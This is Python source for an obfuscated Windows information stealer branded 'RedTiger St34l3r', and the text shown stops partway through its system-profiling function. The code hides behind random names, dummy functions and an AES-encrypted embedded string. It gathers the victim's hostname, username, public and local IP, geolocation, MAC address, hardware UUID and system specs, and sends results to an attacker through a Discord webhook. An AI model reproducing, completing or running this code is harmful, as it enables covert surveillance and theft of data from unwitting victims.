
import sys

def WJYKSKZNUDZGDTDIHUDFMIARQHXNVTNJNEGJSUDBJNEOAMLCIHE():
    def DOWPCOQIMPZIRMAJBUTWFICBJGQYTFICGUAKQATAWMQHAMBHWFGYCPUJLPBKRZDFICGTHEGRPYRGUTZVPBTTKYVXJZBGL():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        FFBBLXZVNDWLHGCZOHUCIQZNLDTQVBNCYSGVCTETNMJPDPMXGHHKZDXIMDOKGPBXNXVQTRESAWYGFDSZXNNSHIUGEEMMMGBADDG = DOWPCOQIMPZIRMAJBUTWFICBJGQYTFICGUAKQATAWMQHAMBHWFGYCPUJLPBKRZDFICGTHEGRPYRGUTZVPBTTKYVXJZBGL()
        if FFBBLXZVNDWLHGCZOHUCIQZNLDTQVBNCYSGVCTETNMJPDPMXGHHKZDXIMDOKGPBXNXVQTRESAWYGFDSZXNNSHIUGEEMMMGBADDG == True:
            return FFBBLXZVNDWLHGCZOHUCIQZNLDTQVBNCYSGVCTETNMJPDPMXGHHKZDXIMDOKGPBXNXVQTRESAWYGFDSZXNNSHIUGEEMMMGBADDG
    except:
        return True
    
if WJYKSKZNUDZGDTDIHUDFMIARQHXNVTNJNEGJSUDBJNEOAMLCIHE() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
from discord import SyncWebhook
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def HAPCHKXCDVFGQLLRCDWOVGLYRRDFCVUTXASOSSSQOEDZJPONFOLHXT(): pass
def FNFVRTPXAXBLTFMVJIZFVZALYQTHKLSLQZPFWNVAUOHDMLAMSGFAOQ(): pass
def DFZYMLFZTBINISMBCIVPXSEFPRQASPMYRSWATNEPRLBJRTYNHC(): pass
def RLRQTWNYLANPRUMROWBMPICZHCKDFMPDMDQXTDIFEKYNFMEMYIFHWUZYKVXHGTPCSIFO(): pass
def OPUNKXFSATYAAEWGTUSUTUZGSRXTKFMUEONYTUDXXEHOJUDGDXLCPZSWUBZEWMSABIDVJGJWSVMMFSYKAPATJELR(): pass
def UUCSHAYHUBDMGZYZTYCTVFULDQOEOTTAUWJWBRCKFYHBVSFSHTGSSQPDJN(): pass
def YGNIIVHXIKAHGBPPCFATGOCGGNPFTPJOGWKEUYIVRYBDRUDDTOTRTIBCTK(): pass
def OEZLKROHSHZLJYNEYBKUEQCLGVMMKLNMFOUCYNCGTCMEVKJXCMTVLPSZZUFKGUQRMJHYZBUUMGTTAXWQRVBEROZUJSSGSREXQDGQ(): pass
def QNWFHNUBANSFSFDVBCPBSXODHPUNFGAQVMMEWASREAVULXQUDJLPCYOYMBSLAYQCKXLLOOEFNPYNTRWALCSXWZXZHMEGDHUZ(): pass
def ZAAOJORKXOJAJAIFYYWROKMDVARASKISUOINBUNYLKJDLJOHDEUQNWRBYVSN(): pass
def TWEGULJAMWQLRCMXRIXDGIQMAMPNZTZWIKPATZQLBBWQFZNDNSLYAGIPNQFFNQUEJ(): pass
def NHKEFBNFRCTKOUABQDJUTZMTNPQJUYBXJFJVEACIVLRWYOUBVPHCJUESNYMHPPM(): pass
def IHYFFIHZNDERKVLGMPIKQEMLVPLXJHYADLYEYMPFLYOBEGNUVWXVSEEIDOGSKYFAMEXBWWGXOWIQNTXGVODLJYLOXSRZOWBYUSJ(): pass
def QWUQXWQSEVQKIEZTUZAVGULLTJOHSYCMRDDKQILCBXOKGKBBZYDTJRITGHOIETEPYLNHFQOQZXBBK(): pass
def YESBBNRAIRONTMBGZVWRBGUYMSIPMJBEHYXZMZXGFQAICLFRRARBZLWBQQUWV(): pass
def STOGCAQUEJCRHUKZCYLWSMLKVKEATVWNOATMYTNLFSEQSGLFCBWPYTBWXFLBMKUDRVGJAGPFFBXK(): pass
def LBIHJVKPNLVSDANZMHWGDETHQIOCBIUZLMMJBZBLXVCZEMGUTGRWITEBBSCBENUIJCXNTVPYGV(): pass
def PHTBJNKUAKFBMKDQXBVVUQTUMHGHOJAIQWFHDFEVVBEKWLTFKXXUEDOVVYSNSSAX(): pass
def RZCFWZRSWTPMKBMFNTGEPZHZPZLOLLRUZMDPFFOMRBOGWKVPJIOFYHQGQTLGKIOAQRTZ(): pass
def ASHWPAWVNIFYMUSGBKYNOUIFCFPFHTYPMCHJNQVDHCUOFLXGYENKVQQVXVQWOEQQNSRDIUWVXIKDSNCYKAIEXHWTSDRHFMLHVSN(): pass

def GIYVELZYNVLMOQZSTMUKYMUTDUMLQJTSLNOVPQDAQGQRCYSADVLXHDWXTX(w3bh00k_ur1, title=None, description=None):
    try:
        client = SyncWebhook.from_url(w3bh00k_ur1)
        embed = discord.Embed(
            title=title,
            description=description,
            color= DTTKKKCYSVPJWFZWSMVDSHBOCYYDWPXYKJLOEMZITPMEDXUIABQDQJAMCAJJTWWYCGOMWNGNAAGKYJJERTCBFJZSEDQUDSNZQH
        )
        embed.set_footer(text=CTYDDRKFZDARVGPASDBJAPLJRUHHJJLJWOROLAERPRXWPAMLKXMNBHIKYFMREUOPOSIEMV, icon_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR)
        client.send(embed=embed, username=QXYCEYRPXWXWGTCQFAGKQNDQWVQARSQYWBPRBZYQLDVIQEFWIOJLGRBELHZIIKDZQX, avatar_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR)
    except: pass

def MPPZQIVYVKWSERYWXNUWNMLKRZELGWTUAIBQPJYLWWDLZYZRXFONSFX(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def PDPGVMCNFOVQVIRLHSRUWXMELURRPSRPYFZEOULPGYMVXWXDTLYLYDYEHYHBZYOHZJIOVEEAUJZLQSDDOTNUENAM():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def GMWXGREKPZWUWWSEBSHCSCYJXDIHXECSIXOPGPAZEABVQIYCMPFPMHGSPRXKEOEQIPHLWOFFMCXQCLJFTDASDFQZCBTTYDK(SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL, DTCDWTZMILAJMZDWTDLGSRVVVLHALQMHUYGXPXPOALEZUWAWUJMVUVMLMC):
    def FLPOSFLBUIJOROHPWKQCRAGGTBERCYKCBXINUIYCDUXUCFPFYQQAURXAEJBFPCPQHTONCOXSLSOAYWEBCHQBQ(QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH, ICWWILVLECAMSNOFTZHCVFUYOQSRQCHDKXAVYQINCKLMEWITRXZTUJLAGVGEVHTAGJE):
        IAVZQKHIETBJVHQLMHJSXFPCEKOYTJIAYMBQXEVZKIBENQPHMTDJWAGDKEDCADXMOOVLDZHTOBQOCQP = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=ICWWILVLECAMSNOFTZHCVFUYOQSRQCHDKXAVYQINCKLMEWITRXZTUJLAGVGEVHTAGJE, iterations=100000, backend=default_backend())
        if isinstance(QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH, str):  
            QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH = QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH.encode()  
        return IAVZQKHIETBJVHQLMHJSXFPCEKOYTJIAYMBQXEVZKIBENQPHMTDJWAGDKEDCADXMOOVLDZHTOBQOCQP.derive(QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH)

    SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL_data = base64.b64decode(SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL)
    ICWWILVLECAMSNOFTZHCVFUYOQSRQCHDKXAVYQINCKLMEWITRXZTUJLAGVGEVHTAGJE = SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL_data[:16]
    GOMXUHLXJZXDDVQCMDWMNTWITDUEOSJIVTSSMBZGNMVYNYABQMUY = SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL_data[16:32]
    SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL_data = SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL_data[32:]
    QWOGCVBJYCPFLCFVHWHBYBAANRCVOGTFNQGESTIPGNMIJSIXNFAMUDKQPL = FLPOSFLBUIJOROHPWKQCRAGGTBERCYKCBXINUIYCDUXUCFPFYQQAURXAEJBFPCPQHTONCOXSLSOAYWEBCHQBQ(DTCDWTZMILAJMZDWTDLGSRVVVLHALQMHUYGXPXPOALEZUWAWUJMVUVMLMC, ICWWILVLECAMSNOFTZHCVFUYOQSRQCHDKXAVYQINCKLMEWITRXZTUJLAGVGEVHTAGJE)
    QHBWDERJWWMMYGLVGEKLKJIWMBLFNFTTKHIAPDNUAMPTHOXAGUPMQECJRXUBZOJWOBMCECDGJWCCOHXFOWVNI = Cipher(algorithms.AES(QWOGCVBJYCPFLCFVHWHBYBAANRCVOGTFNQGESTIPGNMIJSIXNFAMUDKQPL), modes.CBC(GOMXUHLXJZXDDVQCMDWMNTWITDUEOSJIVTSSMBZGNMVYNYABQMUY), backend=default_backend())
    GGERYAXCANSBOMOQBTSCAADVEBSPKREACPYOTFKZVUMBHCAFFKFESXAZNJWZOCDRTYRSSSAUYZQQIN = QHBWDERJWWMMYGLVGEKLKJIWMBLFNFTTKHIAPDNUAMPTHOXAGUPMQECJRXUBZOJWOBMCECDGJWCCOHXFOWVNI.decryptor()
    TAWTSFTVTGWOTMLNEDNSRFMEYQHIRPOPPTYFKSBTECSAAKZNOTILMSXPWPACJWLHTQQJUSCCUGAVJTVRFIYJHYNQXRYXOPY = GGERYAXCANSBOMOQBTSCAADVEBSPKREACPYOTFKZVUMBHCAFFKFESXAZNJWZOCDRTYRSSSAUYZQQIN.update(SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL_data) + GGERYAXCANSBOMOQBTSCAADVEBSPKREACPYOTFKZVUMBHCAFFKFESXAZNJWZOCDRTYRSSSAUYZQQIN.finalize()
    RGWSBYEFXUIQZXAPGXCMFIYWPENFEYBUQBAZRATBNPMQMUTSUPIRJZQSVNZEXTJGQNJFRHDHFSIL = padding.PKCS7(128).unpadder()
    XZSYWDRFADWHEUDWZEUWGXOVBWNNWHGTUPGRVHDISPUZPHJPBRBCVZRIO = RGWSBYEFXUIQZXAPGXCMFIYWPENFEYBUQBAZRATBNPMQMUTSUPIRJZQSVNZEXTJGQNJFRHDHFSIL.update(TAWTSFTVTGWOTMLNEDNSRFMEYQHIRPOPPTYFKSBTECSAAKZNOTILMSXPWPACJWLHTQQJUSCCUGAVJTVRFIYJHYNQXRYXOPY) + RGWSBYEFXUIQZXAPGXCMFIYWPENFEYBUQBAZRATBNPMQMUTSUPIRJZQSVNZEXTJGQNJFRHDHFSIL.finalize()
    return XZSYWDRFADWHEUDWZEUWGXOVBWNNWHGTUPGRVHDISPUZPHJPBRBCVZRIO.decode()

MPPZQIVYVKWSERYWXNUWNMLKRZELGWTUAIBQPJYLWWDLZYZRXFONSFX("")

try: KNQQOFCCRTRXHPJZIGWNQXLUCZLWTQHYNZNLVADCBXHPFBUJLULJNQGA    = socket.gethostname()
except: KNQQOFCCRTRXHPJZIGWNQXLUCZLWTQHYNZNLVADCBXHPFBUJLULJNQGA = "None"

try: DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM    = os.getlogin()
except: DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM = "None"

try: KAFPXUJAHXMKHPGZOZVXPIMFFMQMNGWGJVXRUYPRTQETHTGDZAJYCIFCCKUCLUQSFCYOOUVKPLDDH    = win32api.GetUserNameEx(win32api.NameDisplay)
except: KAFPXUJAHXMKHPGZOZVXPIMFFMQMNGWGJVXRUYPRTQETHTGDZAJYCIFCCKUCLUQSFCYOOUVKPLDDH = "None"

try: OBAHGDBIIZSMTYVVNQSIRZAGLEFNRUEQTPGHWDDVQYYFKORYMJOEGAIFEWTIWFQQVAYWRTGYFCSWRHJWZOMEUWUXXOZWRPWB    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: OBAHGDBIIZSMTYVVNQSIRZAGLEFNRUEQTPGHWDDVQYYFKORYMJOEGAIFEWTIWFQQVAYWRTGYFCSWRHJWZOMEUWUXXOZWRPWB = "None"

try: VGXFRZKCBLCYJZVCKCDPIEFATQKOGVBWQGJLMATYFZGMNFIMRZLGEMLILFUPMDWLNNIDAEKKOKE    = socket.gethostbyname(socket.gethostname())
except: VGXFRZKCBLCYJZVCKCDPIEFATQKOGVBWQGJLMATYFZGMNFIMRZLGEMLILFUPMDWLNNIDAEKKOKE = "None"

HRLFRQAOUOZTQUWYBZQCKEXUUNMDGUCAUSCTTTSBXOELKPYFEP = r"""
9iwbQkXO/H69LQH4in5GSBkLCH2nTCNYIci5EkAZzuZU9G/gwPqqzpPf7Rg2206M3/th8t9va6LOwpKT8L4UiKIdLSts0eWU04THFQTejpV/qJivOpFwRLwaaI9WP9FX+1xiKVtkBZTiuw9TQLafV5Bc7xubB4qOaYHSURidJUTVoZ26T+5zd4TIXF66h8EDKrFd3yUP9FgySVZIiS8PXQ==
"""

CPMSOLFUFRZXEFJXMSAYDWBEQAWWMZDAENQXNMNTQSFMVAVDNXQXRQCLRAPNYJYRWMETJBSHASJAZFGVJ            = "VxfPgmqocKTmIwHaYrSJrVRHmyzaScAbmVuypStPnHrvfzKSOlBNcbHHGvOiyMqehahOTgtUyNOEzJLdQgpvEeojETOUlukBtjlezTkgNEoZoBCmagBQFeklOsnZhovAUPARuazgZsCToulZBxnXOUFsRFiAyxgIkilkhbfZAx"
IIYZWHHBGUISGEBMUZWAJTVRXDJATBAVSAGVYNSDTZLYPWRDMIWWSFYERQRTMBPGINBRPCCSKMQEZZHX        = "redtiger.shop"
DTTKKKCYSVPJWFZWSMVDSHBOCYYDWPXYKJLOEMZITPMEDXUIABQDQJAMCAJJTWWYCGOMWNGNAAGKYJJERTCBFJZSEDQUDSNZQH    = 0xa80505
QXYCEYRPXWXWGTCQFAGKQNDQWVQARSQYWBPRBZYQLDVIQEFWIOJLGRBELHZIIKDZQX = "RedTiger St34l3r"
PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR   = "https://cdn.discordapp.com/attachments/1337898355279401023/1341890893858213908/RedTiger-Logo.png?ex=67b7a4c8&is=67b65348&hm=174ddbd80dd8570fa83779687def6eda441a7c12abd3765d970c1958ceeb1ec8&"
CTYDDRKFZDARVGPASDBJAPLJRUHHJJLJWOROLAERPRXWPAMLKXMNBHIKYFMREUOPOSIEMV    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
ZFWAOTAHPZIBNPRCKIEIKQTQCPGGXJAKLEEOPILETVELWXWUDEFEAYIUIXVAHFPPXJUXORYSQB   = {"text": CTYDDRKFZDARVGPASDBJAPLJRUHHJJLJWOROLAERPRXWPAMLKXMNBHIKYFMREUOPOSIEMV, "icon_url": PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR}
MWJPQONMDCWWSTSYPOTJPVUFMBPBJWRWZTRWUZVVMTUSUGCHZGOUBCBAAMISRONFYIYOLJXRJRQAZIEZLIECVRWOYD    = f'`{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM} "{OBAHGDBIIZSMTYVVNQSIRZAGLEFNRUEQTPGHWDDVQYYFKORYMJOEGAIFEWTIWFQQVAYWRTGYFCSWRHJWZOMEUWUXXOZWRPWB}"`'
NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC    = GMWXGREKPZWUWWSEBSHCSCYJXDIHXECSIXOPGPAZEABVQIYCMPFPMHGSPRXKEOEQIPHLWOFFMCXQCLJFTDASDFQZCBTTYDK(HRLFRQAOUOZTQUWYBZQCKEXUUNMDGUCAUSCTTTSBXOELKPYFEP, CPMSOLFUFRZXEFJXMSAYDWBEQAWWMZDAENQXNMNTQSFMVAVDNXQXRQCLRAPNYJYRWMETJBSHASJAZFGVJ)

EOGSQFWLGGJTDPODQCDBZRSRZLJOKRCPXOYGGRCIQLMGLGTSOZZOZZNWPGXKVYMFRVJMMAIHKAYQCKCW         = os.getenv("WINDIR", None).replace(" ", "%20")
BUXNRMAXQNGMXDEUXOSSVFDWHAKIOKSNAQXQWASCIVLWERIMTJQZCUSGAYFARQ     = os.getenv('USERPROFILE', None).replace(" ", "%20")
CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ   = os.getenv('LOCALAPPDATA', None).replace(" ", "%20")
RGFISSDXDJMUPUFVDUUVRWCGTOQIRXXMFJPDHKYKGDQYHICNFCWANUPNCEAWQVNKRRVLWEARNOWGD = os.getenv('APPDATA', None).replace(" ", "%20")

try:
    JORDHFSPZQNZRHJPEORRPRGKPKPGZTBADKXGNWWYZHGGNJYJWVDF = requests.get(f"https://{IIYZWHHBGUISGEBMUZWAJTVRXDJATBAVSAGVYNSDTZLYPWRDMIWWSFYERQRTMBPGINBRPCCSKMQEZZHX}/api/ip/ip={OBAHGDBIIZSMTYVVNQSIRZAGLEFNRUEQTPGHWDDVQYYFKORYMJOEGAIFEWTIWFQQVAYWRTGYFCSWRHJWZOMEUWUXXOZWRPWB}")
    LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL = JORDHFSPZQNZRHJPEORRPRGKPKPGZTBADKXGNWWYZHGGNJYJWVDF.json()

    HVPUWOGVUWYWLQIUNYGWUYQOKCVMANXDFLIBSVOMAVWEBAKBTAHDSDJVQGUSSTGKODFCMOHCCOVHDVNDRVWLL = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('country', "None")
    HVPUWOGVUWYWLQIUNYGWUYQOKCVMANXDFLIBSVOMAVWEBAKBTAHDSDJVQGUSSTGKODFCMOHCCOVHDVNDRVWLL_code = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('country_code', "None")
    XLSSXGRHGWFLIOYUBSFQQFKOQFFGYEVREYNMUVKHPVKTNWMQUGQGOZPYBUZIYMTFNCMDRQNJNNYEKSAG = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('region', "None")
    XLSSXGRHGWFLIOYUBSFQQFKOQFFGYEVREYNMUVKHPVKTNWMQUGQGOZPYBUZIYMTFNCMDRQNJNNYEKSAG_code = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('region_code', "None")
    RARCOWWBUKBWVJUZBWQBMZKAUWJISJTRLVHEVUCITIGINRNAXRM = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('zip', "None")
    NYBAVGPWGGGNEVJYZVVOJNFAVBZRTRIYKMMCTKOQQYQKWAQLDXGCMPCLJDEQ = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('city', "None")
    NEZVEPQLONQXNNQEFLJXXMCCCBERMOWMQMQXXNIBJUURASXCKPUDPJA = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('latitude', "None")
    YLRMZGPBCFSGWTUCGJZYDLEKLHEEQKFYIZSCNBIANEKPKEKZCLWEGLVIRIASQMS = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('longitude', "None")
    KEMPDLISVENLBOYLLVEDXLVCCJHOVDDAORTODGBRNDWPBXPTMOOPHPZPINSANTRRNAGEEHPYXUPVNLGUJGJJNX = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('timezone', "None")
    FOWLIELFAIHPZRQYDFILZNXHDGGAOFSVEKWUMAFALMTMEDEWTSWJFIPMDMB = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('isp', "None")
    JSOHTQZEURYWOHQBCLEYZXDDBXWPUFFGDFSXTCGGUUIOINPKUEPIPQJJYRMHRNSTKRKCVAEXLYBDJKOTTOBZJVWJBLS = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('org', "None")
    MGLTSCFWDBJOZZMSFGMYGSKGTDCCZOCMDMGVOHFXARCXGNKGKMTAWLKWFSUYJDEKPBAUTEQYOWBMFQGGLZCMAGIAKCCBXAQTUV = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('as', "None")
except:
    JORDHFSPZQNZRHJPEORRPRGKPKPGZTBADKXGNWWYZHGGNJYJWVDF = requests.get(f"http://ip-api.com/json/{OBAHGDBIIZSMTYVVNQSIRZAGLEFNRUEQTPGHWDDVQYYFKORYMJOEGAIFEWTIWFQQVAYWRTGYFCSWRHJWZOMEUWUXXOZWRPWB}")
    LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL = JORDHFSPZQNZRHJPEORRPRGKPKPGZTBADKXGNWWYZHGGNJYJWVDF.json()

    HVPUWOGVUWYWLQIUNYGWUYQOKCVMANXDFLIBSVOMAVWEBAKBTAHDSDJVQGUSSTGKODFCMOHCCOVHDVNDRVWLL = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('country', "None")
    HVPUWOGVUWYWLQIUNYGWUYQOKCVMANXDFLIBSVOMAVWEBAKBTAHDSDJVQGUSSTGKODFCMOHCCOVHDVNDRVWLL_code = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('countryCode', "None")
    XLSSXGRHGWFLIOYUBSFQQFKOQFFGYEVREYNMUVKHPVKTNWMQUGQGOZPYBUZIYMTFNCMDRQNJNNYEKSAG = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('regionName', "None")
    XLSSXGRHGWFLIOYUBSFQQFKOQFFGYEVREYNMUVKHPVKTNWMQUGQGOZPYBUZIYMTFNCMDRQNJNNYEKSAG_code = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('region', "None")
    RARCOWWBUKBWVJUZBWQBMZKAUWJISJTRLVHEVUCITIGINRNAXRM = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('zip', "None")
    NYBAVGPWGGGNEVJYZVVOJNFAVBZRTRIYKMMCTKOQQYQKWAQLDXGCMPCLJDEQ = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('city', "None")
    NEZVEPQLONQXNNQEFLJXXMCCCBERMOWMQMQXXNIBJUURASXCKPUDPJA = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('lat', "None")
    YLRMZGPBCFSGWTUCGJZYDLEKLHEEQKFYIZSCNBIANEKPKEKZCLWEGLVIRIASQMS = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('lon', "None")
    KEMPDLISVENLBOYLLVEDXLVCCJHOVDDAORTODGBRNDWPBXPTMOOPHPZPINSANTRRNAGEEHPYXUPVNLGUJGJJNX = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('timezone', "None")
    FOWLIELFAIHPZRQYDFILZNXHDGGAOFSVEKWUMAFALMTMEDEWTSWJFIPMDMB = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('isp', "None")
    JSOHTQZEURYWOHQBCLEYZXDDBXWPUFFGDFSXTCGGUUIOINPKUEPIPQJJYRMHRNSTKRKCVAEXLYBDJKOTTOBZJVWJBLS = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('org', "None")
    MGLTSCFWDBJOZZMSFGMYGSKGTDCCZOCMDMGVOHFXARCXGNKGKMTAWLKWFSUYJDEKPBAUTEQYOWBMFQGGLZCMAGIAKCCBXAQTUV = LDPTYQUZTJMXPNPICMQEULFXVKKUXLBEMDSHFMFXQTKARCPPELWZAVAUKSNIDQLXKFFIHL.get('as', "None")

def YGNIIVHXIKAHGBPPCFATGOCGGNPFTPJOGWKEUYIVRYBDRUDDTOTRTIBCTK():
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    from discord import SyncWebhook, Embed

    try: CXYBZFOQGOWLXHOCZNNATCCVTNIDKZVAVZKQETPRSSSLOGGXOSNG = {platform.system()}
    except: CXYBZFOQGOWLXHOCZNNATCCVTNIDKZVAVZKQETPRSSSLOGGXOSNG = "None"

    try: MKNHAUYPHDIABYVAIRYPRHNHORNEKPKAZAIVNMINVEYGBNPYDVWEAZYMSQGYGQQKBCKSOD = platform.version()
    except: MKNHAUYPHDIABYVAIRYPRHNHORNEKPKAZAIVNMINVEYGBNPYDVWEAZYMSQGYGQQKBCKSOD = "None"

    try: ZLSTFWDZOTJFINITDFMLZXHITQWSEFAWCWJLLNUGGQFTDNFQKTEAOSWEUCLZX = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: ZLSTFWDZOTJFINITDFMLZXHITQWSEFAWCWJLLNUGGQFTDNFQKTEAOSWEUCLZX = "None"

    try: GMOQQNYTHTYPAMQKMWZJDDCZDIXBZEGYYNVYMVZACSYFSLNOVBABFVUNLJFSKTDNDLWVLOPNJPVUSNZLHCVMNGOAQPDRKR = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
    except: GMOQQNYTHTYPAMQKMWZJDDCZDIXBZEGYYNVYMVZACSYFSLNOVBABFVUNLJFSKTDNDLWVLOPNJPVUSNZLHCVMNGOAQPDRKR = "None"

    try: SNVIJKLPOWZKTZUCJYKTMRAZYVLGYLFIZRWBVKMJGRGNHQXRRIXVOYIQGNQJTTQXKASKAZCCZHOQECYBDAQWFGGRVTSBFZNW = round(psutil.virtual_memory().total / (1024**3), 2)
    except: SNVIJKLPOWZKTZUCJYKTMRAZYVLGYLFIZRWBVKMJGRGNHQXRRIXVOYIQGNQJTTQXKASKAZCCZHOQECYBDAQWFGGRVTSBFZNW = "None"

    try: AVUWKZASBXDNMSCJCKSIQUNZUYYMZRKMQJPFIQFQAAGHXDQFFMTNMO = platform.processor()
    except: AVUWKZASBXDNMSCJCKSIQUNZUYYMZRKMQJPFIQFQAAGHXDQFFMTNMO = "None"

    try: NHLXEOGESYVOYQCDPJIBATCDWRUBSPKOYRSYPVMUJNRMGSPPQVIDDPFXHHDLGSOQOUTYIECKAN = psutil.cpu_count(logical=False)
    except: NHLXEOGESYVOYQCDPJIBATCDWRUBSPKOYRSYPVMUJNRMGSPPQVIDDPFXHHDLGSOQOUTYIECKAN = "None"

